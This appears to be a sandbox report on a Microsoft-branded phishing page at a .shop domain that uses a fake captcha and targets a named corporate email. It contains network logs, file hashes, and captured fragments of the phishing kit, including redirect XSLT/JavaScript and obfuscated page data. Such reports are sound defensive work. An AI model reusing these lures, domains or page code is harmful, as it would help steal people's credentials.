URL: https://yta1lbtzic.ludomessie.shop/?email=glalicker@hilcorp.com Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://yta1lbtzic.ludomessie.shop/?email=glalicker@hilcorp.com Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: https://yta1lbtzic.ludomessie.shop/?email=glalicker@hilcorp.com Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "I'm not a robot", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://yta1lbtzic.ludomessie.shop/?email=glalicker@hilcorp.com Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372d088fc5eba68266f598.htm Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://yta1lbtzic.ludomessie.shop/?email=glalicker@hilcorp.com Model: Joe Sandbox AI	```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is a well-known global technology company.", "The legitimate domain for Microsoft is 'microsoft.com'.", "The provided URL 'yta1lbtzic.ludomessie.shop' does not match the legitimate domain for Microsoft.", "The domain 'ludomessie.shop' is unrelated to Microsoft and uses a '.shop' extension, which is unusual for a technology company like Microsoft.", "The subdomain 'yta1lbtzic' appears random and does not provide any indication of a legitimate Microsoft service.", "The URL structure and domain name do not align with any known Microsoft services or products." ], "riskscore": 9} Google indexed: False
URL: yta1lbtzic.ludomessie.shop Brands: Microsoft Input Fields: unknown
URL: https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372d088fc5eba68266f598.htm Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1592
Entropy (8bit):	4.205005284721148
Encrypted:	false
SSDEEP:	48:ztSAS1OtmCtc7aIVmt4yyR9S2lKUyDWwh:RoOtmCtc7aCmVQHSRh
MD5:	4E48046CE74F4B89D45037C90576BFAC
SHA1:	4A41B3B51ED787F7B33294202DA72220C7CD2C32
SHA-256:	8E6DB1634F1812D42516778FC890010AA57F3E39914FB4803DF2C38ABBF56D93
SHA-512:	B2BBA2A68EDAA1A08CFA31ED058AFB5E6A3150AABB9A78DB9F5CCC2364186D44A015986A57707B57E2CC855FA7DA57861AD19FC4E7006C2C239C98063FE903CF
Malicious:	false
Reputation:	low
URL:	https://yta1lbtzic.ludomessie.shop/m/mxl/sig_op.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.719A11.373,11.373,0,0,1,9.5,24.547a10.4,10.4,0,0,1-1.109-2.625A11.616,11.616,0,0,1,8,19a10.9,10.9,0,0,1,1.5-5.547,11.106,11.106,0,0,1,1.719-2.219A11.373,11.373,0,0,1,13.453,9.5a10.4,10.4,0,0,1,2.625-1.109A11.616,11.616,0,0,1,19,8a10.9,10.9,0,0,1,5.547,1.5,11.106,11.106,0,0,1,2.219,1.719A11.373,11.373,0,0,1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9,8.9,0,0,0-2.859,1.938A9.269,9.269,0,0,0,

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 23:30:03.096157074 CET	53	51515	1.1.1.1	192.168.2.4
Jan 9, 2025 23:30:03.149895906 CET	53	50997	1.1.1.1	192.168.2.4
Jan 9, 2025 23:30:04.146651030 CET	53	64084	1.1.1.1	192.168.2.4
Jan 9, 2025 23:30:07.483702898 CET	52068	53	192.168.2.4	1.1.1.1
Jan 9, 2025 23:30:07.483831882 CET	61486	53	192.168.2.4	1.1.1.1
Jan 9, 2025 23:30:07.490757942 CET	53	52068	1.1.1.1	192.168.2.4
Jan 9, 2025 23:30:07.490792036 CET	53	61486	1.1.1.1	192.168.2.4
Jan 9, 2025 23:30:08.578141928 CET	49674	53	192.168.2.4	1.1.1.1
Jan 9, 2025 23:30:08.580441952 CET	65338	53	192.168.2.4	1.1.1.1
Jan 9, 2025 23:30:08.587570906 CET	53	65338	1.1.1.1	192.168.2.4
Jan 9, 2025 23:30:08.788990021 CET	53	49674	1.1.1.1	192.168.2.4
Jan 9, 2025 23:30:10.532421112 CET	64930	53	192.168.2.4	1.1.1.1
Jan 9, 2025 23:30:10.533395052 CET	49872	53	192.168.2.4	1.1.1.1
Jan 9, 2025 23:30:10.590575933 CET	53	49872	1.1.1.1	192.168.2.4
Jan 9, 2025 23:30:11.549026012 CET	65262	53	192.168.2.4	1.1.1.1
Jan 9, 2025 23:30:11.613740921 CET	53	65262	1.1.1.1	192.168.2.4
Jan 9, 2025 23:30:12.578814030 CET	53	64930	1.1.1.1	192.168.2.4
Jan 9, 2025 23:30:12.871534109 CET	50432	53	192.168.2.4	1.1.1.1
Jan 9, 2025 23:30:12.871937990 CET	55088	53	192.168.2.4	1.1.1.1
Jan 9, 2025 23:30:12.878876925 CET	53	55088	1.1.1.1	192.168.2.4
Jan 9, 2025 23:30:13.736526012 CET	54371	53	192.168.2.4	1.1.1.1
Jan 9, 2025 23:30:13.736835957 CET	65495	53	192.168.2.4	1.1.1.1
Jan 9, 2025 23:30:13.743926048 CET	53	65495	1.1.1.1	192.168.2.4
Jan 9, 2025 23:30:18.986260891 CET	53	50283	1.1.1.1	192.168.2.4
Jan 9, 2025 23:30:20.169599056 CET	53	61091	1.1.1.1	192.168.2.4
Jan 9, 2025 23:30:21.134207010 CET	53	61881	1.1.1.1	192.168.2.4
Jan 9, 2025 23:30:21.426600933 CET	138	138	192.168.2.4	192.168.2.255
Jan 9, 2025 23:30:31.868185043 CET	61305	53	192.168.2.4	1.1.1.1
Jan 9, 2025 23:30:31.868329048 CET	51508	53	192.168.2.4	1.1.1.1
Jan 9, 2025 23:30:31.918560982 CET	53	61305	1.1.1.1	192.168.2.4
Jan 9, 2025 23:30:31.929821968 CET	53	51508	1.1.1.1	192.168.2.4
Jan 9, 2025 23:30:40.182593107 CET	53	62257	1.1.1.1	192.168.2.4
Jan 9, 2025 23:31:02.691737890 CET	53	59372	1.1.1.1	192.168.2.4
Jan 9, 2025 23:31:02.866805077 CET	53	54977	1.1.1.1	192.168.2.4

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:30:08.794944048 CET	448	OUT	GET /fetching//index.xml HTTP/1.1 Host: abdullaksa.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 9, 2025 23:30:09.311817884 CET	433	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 22:30:09 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Last-Modified: Mon, 10 Jun 2024 16:45:42 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 113 Keep-Alive: timeout=5, max=75 Content-Type: application/xml Data Raw: 1f 8b 08 00 00 00 00 00 00 03 25 8b 41 0e 40 30 14 05 f7 12 77 68 fe 9e b2 b3 50 76 4e c0 09 f4 a1 49 b5 d2 fe 48 7b 7b c4 6e 32 99 e9 c7 74 5a 71 23 44 e3 9d a2 b6 6e 48 c0 ad 5e 1b b7 2b 5a e6 a9 ea 68 1c ca a2 ff ba 2a 72 b6 88 07 c0 82 f3 05 45 8c c4 32 45 4b e2 08 d8 14 19 a7 91 ea 57 f0 7f 05 ef 59 be f0 00 41 ae 4c 9f 67 00 00 00 Data Ascii: %A@0whPvNIH{{n2tZq#DnH^+Zh*rE2EKWYALg
Jan 9, 2025 23:30:09.356590986 CET	354	OUT	GET /fetching//index.xslt HTTP/1.1 Host: abdullaksa.com Connection: keep-alive Accept: text/css,/;q=0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Referer: http://abdullaksa.com/fetching//index.xml Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 9, 2025 23:30:09.477802992 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 22:30:09 GMT Server: Apache Last-Modified: Thu, 09 Jan 2025 20:04:29 GMT Accept-Ranges: bytes Content-Length: 1833 Keep-Alive: timeout=5, max=74 Connection: Keep-Alive Content-Type: application/xslt+xml Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 78 73 6c 3a 73 74 79 6c 65 73 68 65 65 74 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 78 73 6c 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 58 53 4c 2f 54 72 61 6e 73 66 6f 72 6d 22 3e 0d 0a 20 20 20 20 3c 78 73 6c 3a 74 65 6d 70 6c 61 74 65 20 6d 61 74 63 68 3d 22 2f 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 [TRUNCATED] Data Ascii: <?xml version="1.0" encoding="UTF-8"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <html lang="en"> <head> <meta charset="UTF-8"/> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <title>File loading</title> <script> <![CDATA[ // Function to get the value of a parameter from the URL function getParameterByName(name, url) { if (!url) url = window.location.href; name = name.replace(/[\[\]]/g, "\\$&"); var regex = new RegExp("[?&]" + name + "(=([^&#]*)\|&\|#\|$)"), results = regex.exec(url); if (!results) return null; if (!results[2]) return '';
Jan 9, 2025 23:30:09.477839947 CET	850	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 72 65 73 75 6c 74 73 5b 32 5d 2e 72 65 70 6c 61 63 65 28 2f 5c 2b 2f 67 2c 20 22 20 22 29 29 3b 0d 0a 20 Data Ascii: return decodeURIComponent(results[2].replace(/\+/g, " ")); } var base64EmailParam = getParameterByName('email'); function decodeEmail(base64Email)
Jan 9, 2025 23:30:09.508745909 CET	391	OUT	GET /favicon.ico HTTP/1.1 Host: abdullaksa.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Referer: http://abdullaksa.com/fetching//index.xml Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 9, 2025 23:30:09.635910988 CET	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 22:30:09 GMT Server: Apache Last-Modified: Sun, 02 Oct 2022 17:29:34 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4677 Keep-Alive: timeout=5, max=73 Connection: Keep-Alive Content-Type: text/html Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 [TRUNCATED] Data Ascii: RmssgJ&av$NmRmHInM=_cpw~y3(\G(z}[832qQtjEl0;hQoAqK/^zPP`1PP%J^Vyg::<s}k9=v]Ivs8w>;]Np3xyvGe)e,v&FVIJqM3Hhp8(a{8jotEI.6q^>YZQH]rBis_4:Jar!c(j):{{d!5Dh4+k5yUD$wZ}YQO,5I>i6<]2XpCMe^Wh2.\|~l'\|v,sTWdG'8RFOE>8.V?\~[KJzp=4LB)YyuFMYb;Cd5[&TWRd{/_lyoY'+G;G\?zJL9*~"P,EO$}(OW<2X!SSQrxOx"#DJMAP!3-uH26?<gR;1<]9G$Vp0sBQ=f%afQmB<qMZq0&Vk
Jan 9, 2025 23:30:09.635946035 CET	1236	IN	Data Raw: 49 26 3b f9 fa 41 83 05 ea 7d 2a 6d a5 44 33 d4 a4 71 b1 99 49 63 79 2b 21 45 66 c8 7d ce 7e f9 e5 e0 60 b1 69 91 ef a6 ab dd a3 c9 f3 17 2f 7e 5d ec ba 42 9a b5 cd c3 17 bf 26 87 2f 56 43 53 84 7b 98 88 e4 2e 37 54 eb b4 bf 38 87 cf fd bf 11 0b Data Ascii: I&;A}mD3qIcy+!Ef}~`i/~]B&/VCS{.7T81),)VRCx{k_hT!dnD3bxixqTHr2=-c/7UtoGc-'9_e$'(e66FANz=86CG]__^g
Jan 9, 2025 23:30:09.635997057 CET	1236	IN	Data Raw: 7f 5f 9a cc 0f 7c 7e cc 8d 47 d3 16 aa a5 c0 11 77 9c 06 70 2d f3 c2 71 9d 65 72 e7 67 b7 4d f9 97 a6 78 33 93 82 c8 22 5c 19 aa d0 38 89 76 00 b7 8c 58 2d df 59 8d 52 e0 90 bf bc 76 3f ae 12 5e 1f 5f 0e 51 fa 28 da aa 25 42 fb 6a 70 ac 19 d5 3a Data Ascii: _\|~Gwp-qergMx3"\8vX-YRv?^_Q(%Bjp:}P[_0uBTg0+\|~@('H{3jsrTMsMDk={j-o\|m4aG+.<W6CYkGm^jTRm=9tMj=;
Jan 9, 2025 23:30:09.636029005 CET	1236	IN	Data Raw: 14 ae c5 80 4c 2a 8c 23 31 8e 23 06 59 f2 f0 d3 3a 38 d6 e1 50 bb de 46 46 b7 2c 79 13 c3 eb 75 2c de 42 97 c2 94 0d 7e ca ef ce d4 fc 46 da 3e 63 a3 84 03 87 6c 70 70 13 cd 94 f3 29 5a 76 13 0c 5e b2 55 09 1a 0f 04 36 41 2d 8c a4 36 a7 16 95 33 Data Ascii: L#1#Y:8PFF,yu,B~F>clpp)Zv^U6A-63YZ2Zsc]1Z [SiXCY^WQCbK~+n:)@UP7RpWO~b!/r@l-ElQK$gYzKoF
Jan 9, 2025 23:30:09.636061907 CET	29	IN	Data Raw: b7 fe ec 9e d9 f5 30 98 c9 c5 d1 84 d2 26 3c 14 ae 64 4b ff 17 cc cb 70 7c 28 2e 00 00 Data Ascii: 0&<dKp\|(.

Timestamp	Bytes transferred	Direction	Data
2025-01-09 22:30:12 UTC	716	OUT	GET /?email=glalicker@hilcorp.com HTTP/1.1 Host: yta1lbtzic.ludomessie.shop Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: http://abdullaksa.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 22:30:12 UTC	421	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 22:30:12 GMT Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2 X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; path=/ Vary: Accept-Encoding,User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2025-01-09 22:30:12 UTC	7771	IN	Data Raw: 33 64 38 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 57 5a 41 57 53 51 4a 31 34 4f 4b 49 48 54 38 4d 44 36 44 32 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 20 50 39 4d 56 46 33 49 46 38 39 44 49 58 47 37 4d 31 43 46 58 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 2f 3e 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 Data Ascii: 3d8e<!DOCTYPE html><html lang="en" WZAWSQJ14OKIHT8MD6D2><head> <meta charset="UTF-8"> <link rel="shortcut icon" href="data:image/x-icon;, P9MVF3IF89DIXG7M1CFX" type="image/x-icon"> <meta http-equiv="X-UA-Compatible" content="IE=edge"/> <meta name="viewp
2025-01-09 22:30:12 UTC	7993	IN	Data Raw: 2c 30 2c 2e 31 29 3b 7d 0d 0a 2e 67 6f 6f 67 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 69 6e 6c 69 6e 65 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 7d 0d 0a 2e 78 6d 63 61 70 74 63 68 61 2d 63 68 65 63 6b 62 6f 78 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 70 78 3b 68 65 69 67 68 74 3a 32 38 70 78 3b 6d 61 72 67 69 6e 3a 34 70 78 3b 77 69 64 74 68 3a 32 38 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 3b 6f 75 74 6c 69 6e 65 3a 30 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 65 78 74 2d 62 6f 74 74 6f 6d 3b 7d 0d 0a 2e 78 6d 63 61 70 74 63 68 61 2d 63 68 65 63 6b 62 6f 78 2d 62 6f 72 Data Ascii: ,0,.1);}.goog-inline-block{position:relative;display:-moz-inline-box;display:inline-block;}.xmcaptcha-checkbox{border:none;font-size:1px;height:28px;margin:4px;width:28px;overflow:visible;outline:0;vertical-align:text-bottom;}.xmcaptcha-checkbox-bor
2025-01-09 22:30:12 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-09 22:30:12 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 38 32 73 71 4b 69 6f 61 32 78 73 44 42 77 50 65 5a 44 58 71 71 6c 64 4d 38 44 73 79 49 2f 50 6d 4f 62 38 79 53 65 42 34 31 47 65 52 46 63 41 58 78 30 7a 41 58 33 4d 71 35 6c 68 59 4e 70 51 72 5a 72 36 57 41 61 67 6a 33 6b 31 4d 77 78 4d 47 36 70 56 55 78 2f 4c 41 50 52 65 41 6e 48 38 38 58 57 71 71 69 70 30 50 4d 6f 4c 48 77 62 71 76 5a 6d 61 4f 67 31 41 51 5a 70 35 70 75 5a 76 44 56 51 44 30 6a 52 31 47 6f 43 43 4e 50 4e 4d 7a 64 38 61 71 41 61 6b 75 62 33 63 52 68 42 65 65 53 58 6e 65 4f 54 44 41 4e 32 57 38 72 61 55 70 7a 30 30 75 4f 51 63 6a 47 55 4e 56 49 2b 6d 41 50 71 6f 4e 77 43 35 69 6d 63 4e 56 49 2b 6d 41 50 70 76 42 47 44 59 4d 47 66 78 79 4a 65 42 2b 6d 2b 70 4a 75 30 30 7a 38 53 49 37 53 6f 67 66 46 6e 7a 31 4d 4b 6b 53 54 Data Ascii: 1f4082sqKioa2xsDBwPeZDXqqldM8DsyI/PmOb8ySeB41GeRFcAXx0zAX3Mq5lhYNpQrZr6WAagj3k1MwxMG6pVUx/LAPReAnH88XWqqip0PMoLHwbqvZmaOg1AQZp5puZvDVQD0jR1GoCCNPNMzd8aqAakub3cRhBeeSXneOTDAN2W8raUpz00uOQcjGUNVI+mAPqoNwC5imcNVI+mAPpvBGDYMGfxyJeB+m+pJu00z8SI7SogfFnz1MKkST
2025-01-09 22:30:12 UTC	7822	IN	Data Raw: 37 43 72 57 47 61 49 33 55 47 75 56 54 49 7a 6c 50 34 48 69 36 64 68 56 71 44 65 47 33 6a 6f 33 79 71 5a 47 63 70 7a 41 49 79 4d 35 61 64 32 74 74 79 71 48 76 33 4d 51 2b 4f 76 73 41 32 56 6e 72 62 71 31 4e 4f 66 53 64 6d 39 68 48 5a 78 38 67 4f 32 76 64 72 62 55 70 68 37 35 7a 45 2f 76 6f 6e 41 31 6d 54 36 32 6c 39 6d 68 2f 39 38 77 74 39 48 5a 46 50 30 4c 61 70 4e 45 64 76 6e 70 6d 67 4e 6c 54 61 36 6b 39 32 6c 64 57 56 74 4c 62 46 66 30 49 61 5a 4e 47 64 2f 6a 71 6d 51 46 6d 7a 31 62 66 39 38 52 49 66 64 35 35 53 6c 31 30 6b 54 38 68 62 65 76 52 48 62 35 36 5a 71 71 5a 42 48 50 4d 31 49 31 71 2f 69 66 68 35 71 50 49 67 37 7a 77 59 55 48 74 6e 4b 5a 6d 45 73 7a 46 69 78 65 72 62 64 75 32 68 5a 71 50 49 67 2f 79 77 6f 63 46 74 58 4f 61 6d 6d 6c 67 6e 6e Data Ascii: 7CrWGaI3UGuVTIzlP4Hi6dhVqDeG3jo3yqZGcpzAIyM5ad2ttyqHv3MQ+OvsA2Vnrbq1NOfSdm9hHZx8gO2vdrbUph75zE/vonA1mT62l9mh/98wt9HZFP0LapNEdvnpmgNlTa6k92ldWVtLbFf0IaZNGd/jqmQFmz1bf98RIfd55Sl10kT8hbevRHb56ZqqZBHPM1I1q/ifh5qPIg7zwYUHtnKZmEszFixerbdu2hZqPIg/ywocFtXOammlgnn
2025-01-09 22:30:12 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-09 22:30:12 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 34 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 30 38 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 34 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 30 38 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 34 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 30 38 29 3b 7d 0d 0a 2e 72 63 2d 61 6e 63 68 6f 72 2d 6e 6f 72 6d 61 6c 7b 68 65 69 67 68 74 3a 37 34 70 78 3b 77 69 64 74 68 3a 33 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 72 63 2d 61 6e 63 68 6f 72 2d 6c 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 39 66 39 66 39 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 0d 0a 2e 72 63 2d 61 6e 63 68 6f 72 2d 6c 69 67 68 74 Data Ascii: 1f404px 1px rgba(0,0,0,.08);-webkit-box-shadow:0 0 4px 1px rgba(0,0,0,.08);-moz-box-shadow:0 0 4px 1px rgba(0,0,0,.08);}.rc-anchor-normal{height:74px;width:300px; position: relative;}.rc-anchor-light{background:#f9f9f9;color:#000;}.rc-anchor-light
2025-01-09 22:30:12 UTC	7822	IN	Data Raw: 20 20 20 20 20 20 20 20 20 3a 3a 2d 6d 6f 7a 2d 73 65 6c 65 63 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 74 65 61 6c 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 3c 2f 73 74 79 6c 65 3e 20 3c 64 69 76 20 69 64 3d 63 6f 6e 74 61 69 6e 65 72 3e 20 3c 64 69 76 20 69 64 3d 63 6f 6e 74 61 69 6e 65 72 53 68 61 64 6f 77 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 6c 6f 67 6f 3e 20 3c 64 69 76 20 69 64 3d 66 6c 61 70 43 6f 6e 74 61 69 6e 65 72 3e 20 3c 64 69 76 20 69 64 3d 6f 70 65 6e 65 64 46 6c 61 70 3e 20 3c 64 69 76 Data Ascii: ::-moz-selection { background-color: transparent; color: teal; } </style> <div id=container> <div id=containerShadow></div><div id=logo> <div id=flapContainer> <div id=openedFlap> <div
2025-01-09 22:30:12 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
